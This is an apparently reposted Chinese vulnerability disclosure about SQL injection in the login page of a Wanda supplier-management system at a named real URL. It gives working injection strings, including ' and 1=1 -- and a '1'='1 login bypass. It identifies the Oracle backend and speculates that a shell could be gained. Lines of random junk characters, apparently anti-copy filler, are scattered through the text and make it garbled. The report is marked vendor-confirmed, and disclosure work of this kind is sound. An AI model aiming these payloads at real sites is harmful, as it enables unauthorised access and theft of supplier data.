万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
. h7 A3 K1 C* b详细说明：
" s  T" O5 R- F0 f+ L. R4 W! J万达scm系统登陆框sql注入。

& d. d5 v/ i: t( K& Hhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
7 p/ \  h3 n$ F/ B

/ D' ~6 \5 Z! l& J" O- K9 r5 Q& I$ w500错误。
" n  J" Z  x8 W& a2 @
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
( A0 P# N1 M. Z; f0 l经过分析，登陆验证的过程应该是：
" k$ n. i" {+ _  T
3 A8 G! ?6 \" H" e% N. D$ S取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png

oracle数据库，存在注入点。@大连万达，你怎么看？
8 d; s: e0 j0 O0 b8 ^# Q5 o6 mhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
5 o6 ]8 [7 C1 S4 a" R! [8 U3 u
系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
漏洞证明：
# |7 Q6 T0 i9 n  D万达scm系统登陆框sql注入。
, @- r) B2 Q* ?1 g3 H- Z
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27

. ~5 A/ c: G, x8 O# T% A6 O
500错误。
0 O% `- x2 p: n' R
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
/ A. T7 s5 X  R" |# o
" {0 L( K7 {8 z' W, c* D: R) x
（截图有一点问题）
/ \+ G3 `7 Q/ j* Z6 D
# N3 p! n0 S6 w$ B/ a怎么饶都饶不过去；经过分析，登陆验证的过程应该是：

1 O6 W$ P4 M* f. S  a取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。

7 @+ k. a5 Q9 \* {; {: q3 @绕过：
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1


oracle数据库，存在注入点。@大连万达，你怎么看？
​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。

修复方案：
。。。


厂商已经确认

9 T  \; h0 a/ w% G. R. K( Z+ H[/td][/tr]
[/table]
" D. `5 T2 V! Q; ?: Q$ l5 }

9 J  _" O* [6 ^9 D- ]